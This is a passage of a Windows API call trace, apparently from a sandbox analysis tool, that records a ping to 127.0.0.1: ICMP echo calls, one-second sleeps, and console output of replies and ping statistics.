0x0 [0099.426] _fileno (_File=0x76ea4c28) returned 1 [0099.426] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0099.426] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.426] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xd18988 [0099.426] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xd18988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0099.426] _fileno (_File=0x76ea4c28) returned 1 [0099.426] _write (in: _FileHandle=1, _Buf=0xd18988*, _MaxCharCount=0x9 | out: _Buf=0xd18988*) returned 9 [0099.426] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0099.426] _fileno (_File=0x76ea4c28) returned 1 [0099.426] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0099.426] LocalFree (hMem=0xd18988) returned 0x0 [0099.426] LocalFree (hMem=0xd27b30) returned 0x0 [0099.426] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x83f174, nSize=0x0, Arguments=0x83f170 | out: lpBuffer="笰Òפּ\x83➷\x94䰨盪✧") returned 0x9 [0099.426] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0099.426] _fileno (_File=0x76ea4c28) returned 1 [0099.426] _get_osfhandle (_FileHandle=1) returned 0x28 [0099.426] GetFileType (hFile=0x28) returned 0x2 [0099.426] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f138 | out: lpMode=0x83f138) returned 0 [0099.426] GetLastError () returned 0x6 [0099.426] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f09c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0099.426] _fileno (_File=0x76ea4c28) returned 1 [0099.426] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0099.426] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.426] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xd18910 [0099.426] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xd18910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0099.426] _fileno (_File=0x76ea4c28) returned 1 [0099.426] _write (in: _FileHandle=1, _Buf=0xd18910*, _MaxCharCount=0x9 | out: _Buf=0xd18910*) returned 9 [0099.426] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0099.426] _fileno (_File=0x76ea4c28) returned 1 [0099.426] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0099.426] LocalFree (hMem=0xd18910) returned 0x0 [0099.426] LocalFree (hMem=0xd27b30) returned 0x0 [0099.426] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x83f170, nSize=0x0, Arguments=0x83f16c | out: lpBuffer="笰Òפּ\x83⟘\x94䰨盪✨") returned 0x9 [0099.426] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0099.426] _fileno (_File=0x76ea4c28) returned 1 [0099.426] _get_osfhandle (_FileHandle=1) returned 0x28 [0099.426] GetFileType (hFile=0x28) returned 0x2 [0099.427] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f134 | out: lpMode=0x83f134) returned 0 [0099.427] GetLastError () returned 0x6 [0099.427] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f098, nSize=0x50 | out: lpBuffer="\x83✨") returned 0x0 [0099.427] _fileno (_File=0x76ea4c28) returned 1 [0099.427] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0099.427] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.427] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xd18ac0 [0099.427] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xd18ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0099.427] _fileno (_File=0x76ea4c28) returned 1 [0099.427] _write (in: _FileHandle=1, _Buf=0xd18ac0*, _MaxCharCount=0x9 | out: _Buf=0xd18ac0*) returned 9 [0099.427] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0099.427] _fileno (_File=0x76ea4c28) returned 1 [0099.427] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0099.427] LocalFree (hMem=0xd18ac0) returned 0x0 [0099.427] LocalFree (hMem=0xd27b30) returned 0x0 [0099.427] Sleep (dwMilliseconds=0x3e8) [0100.433] IcmpSendEcho2Ex (in: IcmpHandle=0xd16b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xd1c2a0, RequestSize=0x20, RequestOptions=0x83f1ec, ReplyBuffer=0xd25270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xd25270) returned 0x1 [0100.434] InetNtopW (in: Family=2, pAddr=0x83f1dc, pStringBuf=0x83f304, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0100.434] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x83f170, nSize=0x0, Arguments=0x83f16c | out: lpBuffer="羠Òפּ\x83⛔\x94䰨盪✣") returned 0x16 [0100.434] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0100.434] _fileno (_File=0x76ea4c28) returned 1 [0100.434] _get_osfhandle (_FileHandle=1) returned 0x28 [0100.434] GetFileType (hFile=0x28) returned 0x2 [0100.434] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f134 | out: lpMode=0x83f134) returned 0 [0100.434] GetLastError () returned 0x6 [0100.434] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f098, nSize=0x50 | out: lpBuffer="\x83✣") returned 0x0 [0100.434] _fileno (_File=0x76ea4c28) returned 1 [0100.434] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0100.434] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0100.434] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xd27fd8 [0100.434] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xd27fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0100.434] _fileno (_File=0x76ea4c28) returned 1 [0100.434] _write (in: _FileHandle=1, _Buf=0xd27fd8*, _MaxCharCount=0x16 | out: _Buf=0xd27fd8*) returned 22 [0100.434] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0100.434] _fileno (_File=0x76ea4c28) returned 1 [0100.434] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0100.434] LocalFree (hMem=0xd27fd8) returned 0x0 [0100.434] LocalFree (hMem=0xd27fa0) returned 0x0 [0100.434] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x83f170, nSize=0x0, Arguments=0x83f16c | out: lpBuffer="羠Òפּ\x83⛿\x94䰨盪✼") returned 0x9 [0100.434] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0100.434] _fileno (_File=0x76ea4c28) returned 1 [0100.434] _get_osfhandle (_FileHandle=1) returned 0x28 [0100.434] GetFileType (hFile=0x28) returned 0x2 [0100.434] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f134 | out: lpMode=0x83f134) returned 0 [0100.434] GetLastError () returned 0x6 [0100.434] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f098, nSize=0x50 | out: lpBuffer="\x83✼") returned 0x0 [0100.434] _fileno (_File=0x76ea4c28) returned 1 [0100.434] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0100.434] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.434] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xd18a30 [0100.434] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xd18a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0100.435] _fileno (_File=0x76ea4c28) returned 1 [0100.435] _write (in: _FileHandle=1, _Buf=0xd18a30*, _MaxCharCount=0x9 | out: _Buf=0xd18a30*) returned 9 [0100.435] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0100.435] _fileno (_File=0x76ea4c28) returned 1 [0100.435] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0100.435] LocalFree (hMem=0xd18a30) returned 0x0 [0100.435] LocalFree (hMem=0xd27fa0) returned 0x0 [0100.435] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x83f174, nSize=0x0, Arguments=0x83f170 | out: lpBuffer="羠Òפּ\x83➷\x94䰨盪✧") returned 0x9 [0100.435] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0100.435] _fileno (_File=0x76ea4c28) returned 1 [0100.435] _get_osfhandle (_FileHandle=1) returned 0x28 [0100.435] GetFileType (hFile=0x28) returned 0x2 [0100.435] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f138 | out: lpMode=0x83f138) returned 0 [0100.435] GetLastError () returned 0x6 [0100.435] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f09c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0100.435] _fileno (_File=0x76ea4c28) returned 1 [0100.435] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0100.435] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.435] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xd18910 [0100.435] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xd18910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0100.435] _fileno (_File=0x76ea4c28) returned 1 [0100.435] _write (in: _FileHandle=1, _Buf=0xd18910*, _MaxCharCount=0x9 | out: _Buf=0xd18910*) returned 9 [0100.435] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0100.435] _fileno (_File=0x76ea4c28) returned 1 [0100.435] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0100.435] LocalFree (hMem=0xd18910) returned 0x0 [0100.435] LocalFree (hMem=0xd27fa0) returned 0x0 [0100.435] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x83f170, nSize=0x0, Arguments=0x83f16c | out: lpBuffer="羠Òפּ\x83⟘\x94䰨盪✨") returned 0x9 [0100.435] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0100.435] _fileno (_File=0x76ea4c28) returned 1 [0100.435] _get_osfhandle (_FileHandle=1) returned 0x28 [0100.435] GetFileType (hFile=0x28) returned 0x2 [0100.435] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f134 | out: lpMode=0x83f134) returned 0 [0100.435] GetLastError () returned 0x6 [0100.435] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f098, nSize=0x50 | out: lpBuffer="\x83✨") returned 0x0 [0100.435] _fileno (_File=0x76ea4c28) returned 1 [0100.435] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.435] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.435] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xd18940 [0100.435] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xd18940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0100.435] _fileno (_File=0x76ea4c28) returned 1 [0100.435] _write (in: _FileHandle=1, _Buf=0xd18940*, _MaxCharCount=0x9 | out: _Buf=0xd18940*) returned 9 [0100.435] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0100.435] _fileno (_File=0x76ea4c28) returned 1 [0100.435] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.435] LocalFree (hMem=0xd18940) returned 0x0 [0100.435] LocalFree (hMem=0xd27fa0) returned 0x0 [0100.435] Sleep (dwMilliseconds=0x3e8) [0101.449] IcmpSendEcho2Ex (in: IcmpHandle=0xd16b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xd1c2a0, RequestSize=0x20, RequestOptions=0x83f1ec, ReplyBuffer=0xd25270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xd25270) returned 0x1 [0101.449] InetNtopW (in: Family=2, pAddr=0x83f1dc, pStringBuf=0x83f304, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0101.449] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x83f170, nSize=0x0, Arguments=0x83f16c | out: lpBuffer="羠Òפּ\x83⛔\x94䰨盪✣") returned 0x16 [0101.449] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0101.449] _fileno (_File=0x76ea4c28) returned 1 [0101.449] _get_osfhandle (_FileHandle=1) returned 0x28 [0101.449] GetFileType (hFile=0x28) returned 0x2 [0101.449] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f134 | out: lpMode=0x83f134) returned 0 [0101.449] GetLastError () returned 0x6 [0101.449] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f098, nSize=0x50 | out: lpBuffer="\x83✣") returned 0x0 [0101.449] _fileno (_File=0x76ea4c28) returned 1 [0101.449] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0101.449] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0101.449] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xd27fd8 [0101.449] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xd27fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0101.449] _fileno (_File=0x76ea4c28) returned 1 [0101.449] _write (in: _FileHandle=1, _Buf=0xd27fd8*, _MaxCharCount=0x16 | out: _Buf=0xd27fd8*) returned 22 [0101.450] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0101.450] _fileno (_File=0x76ea4c28) returned 1 [0101.450] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0101.450] LocalFree (hMem=0xd27fd8) returned 0x0 [0101.450] LocalFree (hMem=0xd27fa0) returned 0x0 [0101.450] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x83f170, nSize=0x0, Arguments=0x83f16c | out: lpBuffer="羠Òפּ\x83⛿\x94䰨盪✼") returned 0x9 [0101.450] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0101.450] _fileno (_File=0x76ea4c28) returned 1 [0101.450] _get_osfhandle (_FileHandle=1) returned 0x28 [0101.450] GetFileType (hFile=0x28) returned 0x2 [0101.450] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f134 | out: lpMode=0x83f134) returned 0 [0101.450] GetLastError () returned 0x6 [0101.450] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f098, nSize=0x50 | out: lpBuffer="\x83✼") returned 0x0 [0101.450] _fileno (_File=0x76ea4c28) returned 1 [0101.450] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0101.450] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.450] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xd18a30 [0101.450] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xd18a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0101.450] _fileno (_File=0x76ea4c28) returned 1 [0101.450] _write (in: _FileHandle=1, _Buf=0xd18a30*, _MaxCharCount=0x9 | out: _Buf=0xd18a30*) returned 9 [0101.450] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0101.450] _fileno (_File=0x76ea4c28) returned 1 [0101.450] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0101.450] LocalFree (hMem=0xd18a30) returned 0x0 [0101.450] LocalFree (hMem=0xd27fa0) returned 0x0 [0101.450] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x83f174, nSize=0x0, Arguments=0x83f170 | out: lpBuffer="羠Òפּ\x83➷\x94䰨盪✧") returned 0x9 [0101.450] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0101.450] _fileno (_File=0x76ea4c28) returned 1 [0101.450] _get_osfhandle (_FileHandle=1) returned 0x28 [0101.450] GetFileType (hFile=0x28) returned 0x2 [0101.450] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f138 | out: lpMode=0x83f138) returned 0 [0101.450] GetLastError () returned 0x6 [0101.450] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f09c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0101.450] _fileno (_File=0x76ea4c28) returned 1 [0101.450] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0101.450] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.450] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xd18a30 [0101.450] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xd18a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0101.450] _fileno (_File=0x76ea4c28) returned 1 [0101.450] _write (in: _FileHandle=1, _Buf=0xd18a30*, _MaxCharCount=0x9 | out: _Buf=0xd18a30*) returned 9 [0101.450] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0101.450] _fileno (_File=0x76ea4c28) returned 1 [0101.450] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0101.450] LocalFree (hMem=0xd18a30) returned 0x0 [0101.450] LocalFree (hMem=0xd27fa0) returned 0x0 [0101.450] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x83f170, nSize=0x0, Arguments=0x83f16c | out: lpBuffer="羠Òפּ\x83⟘\x94䰨盪✨") returned 0x9 [0101.450] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0101.450] _fileno (_File=0x76ea4c28) returned 1 [0101.450] _get_osfhandle (_FileHandle=1) returned 0x28 [0101.450] GetFileType (hFile=0x28) returned 0x2 [0101.450] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f134 | out: lpMode=0x83f134) returned 0 [0101.451] GetLastError () returned 0x6 [0101.451] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f098, nSize=0x50 | out: lpBuffer="\x83✨") returned 0x0 [0101.451] _fileno (_File=0x76ea4c28) returned 1 [0101.451] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.451] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.451] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xd18940 [0101.451] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xd18940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0101.451] _fileno (_File=0x76ea4c28) returned 1 [0101.451] _write (in: _FileHandle=1, _Buf=0xd18940*, _MaxCharCount=0x9 | out: _Buf=0xd18940*) returned 9 [0101.451] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0101.451] _fileno (_File=0x76ea4c28) returned 1 [0101.451] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.451] LocalFree (hMem=0xd18940) returned 0x0 [0101.451] LocalFree (hMem=0xd27fa0) returned 0x0 [0101.451] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x83f0f8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0101.451] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x83f0cc, nSize=0x0, Arguments=0x83f0c8 | out: lpBuffer="羠Ò\x83᧰\x94䰨盪❏") returned 0x5c [0101.451] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0101.451] _fileno (_File=0x76ea4c28) returned 1 [0101.451] _get_osfhandle (_FileHandle=1) returned 0x28 [0101.451] GetFileType (hFile=0x28) returned 0x2 [0101.451] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f090 | out: lpMode=0x83f090) returned 0 [0101.451] GetLastError () returned 0x6 [0101.451] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83eff4, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0101.451] _fileno (_File=0x76ea4c28) returned 1 [0101.451] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.451] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0101.451] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0xd28068 [0101.451] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xd28068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0101.451] _fileno (_File=0x76ea4c28) returned 1 [0101.451] _write (in: _FileHandle=1, _Buf=0xd28068*, _MaxCharCount=0x5c | out: _Buf=0xd28068*) returned 92 [0101.451] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0101.451] _fileno (_File=0x76ea4c28) returned 1 [0101.451] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.451] LocalFree (hMem=0xd28068) returned 0x0 [0101.451] LocalFree (hMem=0xd27fa0) returned 0x0 [0101.451] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x83f0d8, nSize=0x0, Arguments=0x83f0d4 | out: lpBuffer="羠Ò\x83ᨧ\x94䰨盪❓") returned 0x61 [0101.451] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0101.451] _fileno (_File=0x76ea4c28) returned 1 [0101.451] _get_osfhandle (_FileHandle=1) returned 0x28 [0101.451] GetFileType (hFile=0x28) returned 0x2 [0101.451] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f09c | out: lpMode=0x83f09c) returned 0 [0101.451] GetLastError () returned 0x6 [0101.451] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f000, nSize=0x50 | out: lpBuffer="\x83❓") returned 0x0 [0101.451] _fileno (_File=0x76ea4c28) returned 1 [0101.451] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.451] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0101.451] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xd28070 [0101.451] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xd28070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0101.451] _fileno (_File=0x76ea4c28) returned 1 [0101.451] _write (in: _FileHandle=1, _Buf=0xd28070*, _MaxCharCount=0x61 | out: _Buf=0xd28070*) returned 97 [0101.452] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0101.452] _fileno (_File=0x76ea4c28) returned 1 [0101.452] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.452] LocalFree (hMem=0xd28070) returned 0x0 [0101.452] LocalFree 